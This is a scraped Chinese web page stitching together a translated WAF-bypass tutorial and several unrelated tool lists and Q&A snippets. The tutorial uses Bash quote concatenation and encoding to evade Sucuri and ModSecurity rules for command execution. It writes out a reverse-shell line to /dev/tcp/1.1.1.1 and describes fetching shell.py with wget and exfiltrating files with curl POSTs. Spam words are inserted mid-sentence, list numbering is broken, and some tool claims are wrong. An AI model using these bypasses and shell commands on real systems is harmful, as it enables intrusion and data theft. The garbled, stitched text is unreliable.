1.WAF绕过技术系列文章(二)
2.介绍Linux运维常用工具精选介绍linux运维常用工具
3.局域网IP端口扫描工具那个好
4.最佳的源码75个网络安全工具
5.什么是NC,在那里可以下载到它?
WAF绕过技术系列文章(二)
在前面的下载文章中,我们学习了如何通过通配符绕过WAF规则,源码特别是下载使用问号通配符。但是源码,绕过WAF的下载php 微博 源码方法远不止于此。对于不同的源码攻击,WAF规则绕过方法各不相同。下载例如,源码在SQL注入中,下载你可以利用注释语法来绕过WAF,源码而不仅仅是下载简单的加号。
当目标网站的源码WAF防御级别较低时,星号和连字符能帮你成功绕过WAF。下载但这只适用于SQL注入,源码不能用于本地文件包含和远程命令执行。对于某些特殊场景,WAF很难真正防御住针对目标网站的远程命令执行,因为这种攻击使用了字符串连接符。
如果你想实际操作这些绕过方法,可以在我创造的FluxCapacitor手动练习,这是一个在hackthebox上的漏洞演示虚拟机。
在许多编程语言中,字符串连接通常通过二进制符号实现。例如,加号,"Hello, " + "World"得到值为"Hello, World"。在其他编程语言中,连接符可能是不同符号,特别是涉及到隐式的类型转换,并不会使用加号等符号。例如在Perl和PHP中连接符为.,在Lua等语言中,连接符为..
但是你可别认为这是连接两个字符串的唯一方式。
当你在Bash使用C,C++,Python等编程语言时,你可以利用一种基于Bash的字符串连接特性,即:两个相邻的字符串即使中间没有任何符号,它们也可被当作连接在一起,"Hello," "World"等同于"Hello, World"。这个特性不仅适用于printf和echo等命令,还可适用于整体Bash语法。让我们从简单的例子开始。
下面的所有命令运行结果相同:
从上我们可以清楚了解到Bash中的字符串连接特性。实际上,'te's't'是由三个字符串组成:字符串te、字符串s和字符串t。这种语法可以有效地绕过基于“字符串匹配”的WAF规则。
ModSecurity中的领取奖品源码防御规则SecRule ARGS "@pm passwd shadow groups"…将拦截所有包含字符串passwd或字符串shadow的请求。但是,如果我们把它们转换成pa'ss'wd或sh'ad'ow呢?就像我上面所提到的那样。而且,你不仅可以使用连接字符串来代替文件参数,还可以用来代替执行路径!
下面的所有命令运行结果也相同:
现在,我们已经发现一个远程命令执行的绕过WAF方法。如果你面临的WAF存在基于敏感字符串的拦截,你就可以用它绕过WAF规则:
下面我会用PHP代码做些测试,像往常一样,目标WAF是sucuri WAF和ModSecurity。如下是我们的网页代码,当然,它显得太过简单,功能主要是利用curl和system()形成一个命令执行场景。虽然它看起来很不靠谱,但奇怪的是,你可以在多个实际应用场景发现这种愚蠢的代码。
我想我在发布这些文章后,Sucuri会立马把我拉黑。但是,我发誓:我使用Sucuri waf与ModSecurity进行比较,不是因为我要说明哪个更好。因为Sucuri被广泛使用,如果有用户阅读了本文,就可以在他们的自己的Web应用上更好地进行安全测试。
首先,我尝试发出请求获取 google.com,而使用最原始地请求:
如预期的一样,返回了 google.com的页面,基于地理位置,让我跳转到 www.google.de:
现在,为了做坏事,我使用分号破坏curl语法,尝试执行其他系统命令。但是当我试图读取/etc/passwd文件时,Sucuri就会拦截请求,请求如下:
被Sucuri拦截的原因如下:“检测到一个RFI/LFI攻击”。我认为(只是一个假设)Sucuri的这个拦截使用了类似于我们上面所提及的“字符串匹配”技术,它可能会拦截所有常见的路径和文件名,如/etc/passwd。当我把这个WAF的拦截力度调到最低时,我就可以利用两个单引号来绕过!
我知道你现在在想什么:“就算你可以读取passwd文件又怎样……你可以绕过Sucuri WAF得到一个shell吗?”这个问题的答案当然是,YES!唯一的问题就是我们不能使用netcat,因为它还没有安装。搜索王源码
返回一个shell的最简单方法是使用bash -i命令:bash -i >& /dev/tcp/1.1.1.1/ 0>&1,但不幸的是,它太复杂了,很难彻底绕过WAF,这同时也意味着很难使用一些php、perl或python代码来获得shell。Sucuri WAF频繁拦截了我的请求,原因是:检测到模糊攻击。
接下来,我尝试使用curl或wget命令将python的反弹shell脚本上传上去,以获得shell。shell.py代码如下:
然后,我们在本机使用python -c SimpleHTTPServer或php -s等搭建Web服务,方便目标服务器从中下载python文件,下载shell.py文件用以下语法:
好的,Sucuri Waf没有拦截这个请求,但是ModSecurity通常会拦截这类请求,为了要绕过这类WAF规则,可以使用wget+ip转换+字符串连接来达成:
第一个命令使用wget下载shell文件到/tmp/。第二个命令使用chmod修改其可执行权限,第三个命令是执行它。如您所见,wget命令发出的请求中没有指明文件名,因此被下载的文件被命名为index.html。你可以使用netcat 命令nc手动写入HTTP的响应头和内容主体来决定文件内容,如下所示:
接下来,我们要绕过更难的WAF
你可能认为我们可以用上面的技术绕过OWASP核心规则集的低级规。但是,这是不可能的。因为有两个小东西叫做normalizePath和cmdLine。在ModSecurity中,它们被称为“转换函数”,用于将用户输入的原始数据先转换,然后再匹配。如果WAF认为数据无害,才会发送原始数据到Web服务器。
normalizePath:它会删除字符串中的多个斜杠、目录的自引用和目录的上级引用(除了最开始的输入)。
cmdLine:由Marc Stern开发,会将所有的输入规范化,例如/e't'c/pa'ss'wd会被转换规范为/etc/passwd。总之它可以做很多事:
因为cmdLine,WAF规则就可以拦截所有利用字符串连接来进行远程命令执行的尝试,拦截信息如下:
现在我不能读取/etc/passwd,但不要绝望!OWASP核心规则集会拦截常用的文件路径和命令,但它不能对目标应用的facenet源码解读源代码执行拦截。我虽然不能使用分号(这意味着我不能跳出curl语法),但我可以使用curl来提取文件并将其发送到远程服务器。以上方法可绕过0到3级别的防御。
主要方法是利用POST的HTTP请求将文件发送到远程服务器,命令如下:
在此基础上,我们把@编码为%:
如果防御等级为4,以上这些都不起作用,因为payload中的连字符、正斜杠等字符会引起拦截。但好消息是,防御级别4在生产环境中很少见。
上面所述的绕过技术同样也可以应用于反斜杠字符。反斜杠不是用来串联字符串,而是用来转义:
以上就是全部内容。谢谢!
来源: WAF绕过技术系列文章(二)|NOSEC安全讯息平台 - NOSEC.ORG
白帽汇从事信息安全,专注于安全大数据、企业威胁情报。
公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。
为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。
介绍Linux运维常用工具精选介绍linux运维常用工具
Linux运维,即Linux操作系统的运作和维护,是硬件和软件的完整的综合体。Linux系统的优点在于其安全性、体系结构的简洁性、可靠性和可配置性等等,所以Linux在服务器领域广泛应用。有效的Linux系统的运维,需要选择合适的工具,了解常用的Linux运维工具,可以节省运维人员的时间,提高工作效率。
常用工具精选介绍:
第一,GitHub。GitHub是一个分布式源代码管理(SCM)系统,它也是一个开源代码仓库,可以供程序员免费下载和发布各种开源代码。使用GitHub,可以实现用于多成员的开发框架,提前捕获缺陷,进行版本库管理,还可以方便地处理分支合并和代码更新。sem timedwait 源码
第二,Netcat。Netcat是系统管理员和安全专家经常使用的一种强大的网络实用程序。它可以在Linux下以多种协议建立网络连接,一般用于解决系统连接、端口扫描、调试服务器程序、远程管理等问题。
第三,Crontab。Crontab是Linux系统中一种功能强大的定时任务管理命令,可以通过它来设置按时执行的程序运行等任务,其实现的方式是在系统的crontab文件中写入定时任务的代码,以实现后台定时运行的效果。
第四,Aide。Aide是一款Linux系统安全工具,它可以帮助检测Linux系统文件的变化,如果发现了不正常的变化,就会自动发出警报,使系统管理员能及时发现安全漏洞,从而防范系统攻击。
第五,Nmap。Nmap是Linux上一款功能非常强大的端口扫描工具,可以在不同的网络环境中帮助运维人员发现网络安全问题,同时可以帮助管理员发现端口打开和关闭的状况。
以上就是Linux强大的运维工具,不管是初学者还是高手,在运维Linux系统时,会用到以上工具。如果你仅仅只了解Linux的常见命令,肯定不及以上这些工具来的实用。正确理解这些工具的使用方法,是运维Linux的基础。
局域网IP端口扫描工具那个好
Netcat好。
Netcat是一个多用途的网络调试工具,具有内置的端口扫描功能。您可以在 NetBSD、FreeBSD、Linux、macOS 等上安装它
局域网IP端口扫描工具那个好
第一款:端口监控
TcpViews是一款免费的端口和线程监控工具,可以列出当前所有TCP和UDP端口的进程清单,包括本地和远程地址的TCP连接,其实和系统命令netstat类似,不过是GUI界面的,使用方便,占用资源少,默认字体在中文环境下很小,需要手动修改。在服务器上运行的话,默认刷新时间不要用默认的1秒。
局域网ip扫描工具哪个好用(讲解运维管理服务器常用的工具)
第二款:进程监控
Process Explorer是一款免费的进程监视工具,功能比Windows自带的任务管理器要强大很多,不仅可以监视、暂停、终止进程,还可以查看进程调用的DLL文件,是预防病毒、查杀木马的好帮手。
第三款:局域网IP扫描工具
NetBScanner是免费的IP扫描器,使用NetBIOS协议扫描指定IP范围内的所有电脑,同时显示所有目标地址的详细信息,包括计算机名、工作组/域名,MAC地址、网卡信息等。并且支持导出为文本/html/xml/csv等格式。
第四款:teamviewer
teamviewer是一个能穿透内网远程控制的工具,不管有没有防火墙,有没有nat,只需要在两台计算机上同时运行teamviewer即可,而不需要进行安装。该软件第一次启动在两台计算机上自动生成伙伴ID,只需要输入你的伙伴的ID到teamviewer,然后就会立即建立连接。
第五款:代码编辑
Notepad++是一个免费开源的源程序代码、HTML网页代码编辑工具,支持多达数十种常见源代码或脚本的语法,包括C,C++,Java,C#,XML,HTML,PHP,Javascript,RC resource file,makefile等,功能非常强大。在服务器上安装后可以直接修改网站上的源程序代码。
第六款:putty
putty是一个Telnet、SSH、rlogin、纯TCP以及串行接口连接软件。较早的版本仅支持Windows平台,在最近的版本中开始支持各类Unix平台。
局域网IP端口扫描工具那个好
IP Scanner Pro mac是一款功能强大的局域网IP扫描工具,IP Scanner Pro扫描本地网络以建立具有IP地址的所有计算机和设备。可以根据需要安排扫描结果。识别设备后,可以为其分配任何名称和图标,以便在常规列表中更容易识别。
用于Macintosh的IP扫描程序扫描您的局域网,以确定LAN上所有计算机和Internet设备的标识。功能强大,使用简单直观。
最佳的个网络安全工具
在这个纷繁复杂的网络世界中,为了保护你的系统和数据安全,拥有一套强大而可靠的网络安全工具显得尤为重要。以下是一些最佳的个网络安全工具,它们涵盖了风险评估、协议检测、入侵防护,以及网络审计等多个方面,确保你的网络防线坚固如铁。
**1. Nessus** - 作为开源的风险评估工具,Nessus在Linux/BSD/Unix平台上支持远程安全扫描,能够生成详尽的报告并提供改进建议,是安全检查的得力助手。
**2. Tenable** - 这家公司专注于网络安全暴露管理,提供全面的解决方案,帮助企业实时监控网络安全状况。
**3. Ethereal** - 这款网络协议检测工具,开源且跨Unix/Windows平台,交互式数据包分析能力强大,对网络通信有深入洞察。
**4. Snort** - 作为入侵检测系统,Snort以开源著称,能对IP网络进行深入分析和协议/内容检测,防止潜在威胁。
**5. Netcat** - 作为基础的网络工具,Netcat支持TCP/UDP连接,是网络调试和探测的必备工具。
**6. TCPDump/WinDump** - 作为网络监测和数据收集工具,它们在命令行中表现出色,跨平台适应力强。
**7. Hping2** - 这个网络探测工具支持多种协议包发送,还具备traceroute功能,让你轻松测试网络连接。
**8. DSniff** - 用于网络审计和渗透测试,能够监视和分析网络数据,提供深入的网络安全洞察。
**9. SSHmitm, webmitm** - 以及商业工具如GFI LANguard、Ettercap和Whisker/Libwhisker,它们在数据交换和MITM攻击防范中扮演重要角色。
**. SSH, OpenSSH** - 开源和商业的SSH/SSH协议保证了远程登录的安全,而Sam Spade和ISS Internet Scanner则在应用层风险评估中提供支持。
**. Tripwire** - 这个开源工具提供数据完整性监控,商业版本则在Linux上更胜一筹,是Nessus的替代品。
**. Linux/BSD/Unix/Windows平台** - 你的选择范围广泛,适应不同操作系统。
**. Nikto** - 开源的web安全扫描工具,有助于检测潜在的漏洞。
**. Kismet** - 无线嗅探工具,针对Wi-Fi和蓝牙设备,商业版本功能更全面。
**. SuperScan** - 作为Windows上的免费端口扫描器,McAfee提供强大的防护。
**. L0phtCrack** - 这款口令审计工具在破解口令方面独具优势。
**. Retina** - 商业风险评估工具BeyondTrust,提供深度的安全评估。
**. Netfilter** - Linux内核防火墙iptables,状态检测和NAT功能强大。
**. traceroute/ping/telnet/whois** - 基础命令,跨平台且实用。
**. Fport** - Windows上的增强netstat,专为Windows设计。
**. SAINT** - 商业风险评估工具,曾开源,适用于UNIX类平台。
**. Network Stumbler** - 无线接入点搜索工具,Windows版本,Kismet在UNIX上更受欢迎。
**. SARA** - SATAN的衍生工具,开源,支持Linux/BSD/Unix。
**. N-Stealth** - 商业Web扫描工具,Windows专属,源代码不公开。
**. AirSnort** - 无线WEP密码破解工具,多平台可用。
**. NBTScan** - 收集Windows网络信息的工具,开源,跨平台。
**. GnuPG/PGP** - 加密库,开源/商业,适用于所有主要平台。
**. OpenSSL** - 用于SSL/TLS加密的开源库,广泛支持。
**. NTop** - 显示网络流量的开源工具,适合监控网络使用情况。
**. Nemesis** - 命令行工具,用于测试网络设备,Linux专用。
**. LSOF** - Unix的诊断工具,列出系统打开的文件,开源。
**. Hunt** - Linux上的高级包嗅探工具,用于会话劫持。
**. Honeyd** - 个人 honeynet 实验平台,提供虚拟主机模拟,开源。
**. Achilles** - 代理服务器测试工具,开源,Windows可用。
**. Brutus** - 网络认证破解工具,字典攻击支持,免费下载(Windows)。
**. Stunnel** - 多用途SSL加密外壳,开源,跨平台。
**. Paketto Keiretsu** - TCP/IP工具集合,开源,功能丰富。
**. Fragroute** - 损坏IDS工具,开源,支持多种平台。
**. SPIKE Proxy** - 用于web安全检测的开源HTTP代理。
**. THC-Hydra** - 网络认证破解工具,开源,适合多种平台。
**. Nessus功能的补充** - 包括OpenBSD、TCP Wrappers、pwdump3等工具,涵盖了更多安全细节。
通过这些工具,你可以全面地保护你的网络环境,确保安全无虞。每个工具都有其独特的优势,可根据你的具体需求来选择和部署。记住,安全永远是网络世界中的首要任务。
什么是NC,在那里可以下载到它?
NC是网络计算机(Networke Computer) 的简称,是一类基于网络计算环境的计算设备,除了必要的人机交换设备(如监视器和输入)外,一般没有外部存储设备,也很少有扩展口,NC可以实现Internet功能,通过网络进行信息查询和信息处理。实用、廉价、管理方便,在服务器端统一升级是其显著特点。
NC是Oracle公司于年提出的,当时在计算机和通信界引起极大反响,同年便成立了“网络计算机联盟”。随后,IBM、Apple、 Netscape、 Oracle和Sun等五大厂商联合公布了NC的工业标准--《网络计算机参考简要特征》(简称NC-1规范),内容包括支持Java、HTML、FTP、TCP/IP以及CGI的规范。包括世界最大的消费类和商业电子设备生产商、通信厂商、软件开发商、无线系统生产商、微处理器生产商、外设制造商以及信用卡公司等多家厂商立即表示支持制定这一技术规范。
尽管NC概念已出现多年,但并未得到很好的运用。一方面网络环境(传输网络的带宽和网卡的速度等)一直无法满足NC运行的需求,另一方面大多数应用系统还没有过渡到浏览器/服务器(B/S)模式,对老的Windows应用软件缺乏解决方案。
但近两年,应用环境发生了很大的变化,主要应用软件和数据逐渐转移到网络上:WBT模式基本上解决了与Windows应用软件兼容的问题;LBT模式又解决了利用开放源代码软件发展NC的问题;宽带传输网络的迅速发展和普及,为NC的推广创造了条件。
